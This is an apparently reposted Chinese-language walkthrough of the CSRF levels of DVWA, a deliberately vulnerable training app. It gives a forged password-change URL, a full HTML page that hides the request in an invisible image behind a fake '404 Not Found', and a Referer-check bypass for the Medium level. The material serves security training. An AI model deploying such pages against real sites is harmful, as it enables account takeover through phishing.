DVWA CSRF:Cross-site request forgery(跨站请求伪造)全等级

x33g5p2x  于2022-02-12 转载在 其他  
字(1.4k)|赞(0)|评价(0)|浏览(294)

CSRF:Cross-site request forgery(跨站请求伪造)

本章使用的浏览器是Firefox63,由于浏览器和版本不同,复现结果可能不同

1.Low

这是一个修改用户密码的界面,查看url可以发现,修改新密码直接通过url传参给服务器

192.168.171.10/vulnerabilities/csrf/?password_new=12345&password_conf=12345&Change=Change#

利用方法1:把密码改成自己需要的,然后把网址改成短网址,再欺骗用户点击,从而修改密码。

利用方法2:把下面网页放到钓鱼服务器上,然后诱导用户访问,访问之后密码就会被修改。

<!--CSRF.html-->

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>
<body>
    <img src="http://192.168.171.10/vulnerabilities/csrf/?password_new=12345&password_conf=12345&Change=Change#" border="0" style="display: none;"/>
    <h1>404 Not Found.</h1>
    <h2>hello world!</h2>
</body>
</html>

打开这个html文件

再次登录发现密码已经成功修改。

2.Medium

本等级的

Linux靶机ip为192.168.171.10

另一台Server 2003服务器ip为192.168.171.8

模拟的win 7客户机ip为192.168.171.2
HTTP Refererheader的一部分,当浏览器向web服务器发送请求的时候,一般会带上Referer,告诉服务器该网页是从哪个页面链接过来的,服务器因此可以获得一些信息用于处理。

——百度百科

medium类型的代码在Low级别的基础上,加上了对用户请求头的中的Referer字段进行验证

源代码关键语句:

if( stripos( $_SERVER[ 'HTTP_REFERER' ] ,$_SERVER[ 'SERVER_NAME' ]) !== false )

抓包内容:

SERVER_NAME对应着Host,HTTP_REFERER对应着Referer。

必须Referer里面有Host的内容才能修改密码,故方法一方法无效。

但是方法二还可以用。

可以把HTML文件修改成靶机ip地址,或者吧文件放到以靶机ip地址命名的的目录里,然后与host对住,就可以修改密码了。

修改之后抓包查看:

登录查看密码已经成功修改了。

3.High

配合XSS利用

4.Impossible

需要输入原密码才能修改密码,CSRF无解

相关文章